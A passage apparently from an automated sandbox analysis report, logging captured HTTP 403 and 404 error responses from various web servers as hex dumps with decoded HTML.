72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:24 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:24 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:27:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:25 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:25 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Fri, 15 Sep 2023 05:27:25 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:26:57 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:26 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:26 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:26 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9EJbCEIM8n9Xxk87HL4%2Br8i9FL2BkqBTchJ%2BP1pJttq3Kh3egtb7p%2Bo%2F1T9kpAuyvk9zmqoUNy8aHLIhlUaxNECyX45cn68jWei7tvzJPwQWsrVCKeFtJbRz2SUA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75e87bf44257-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 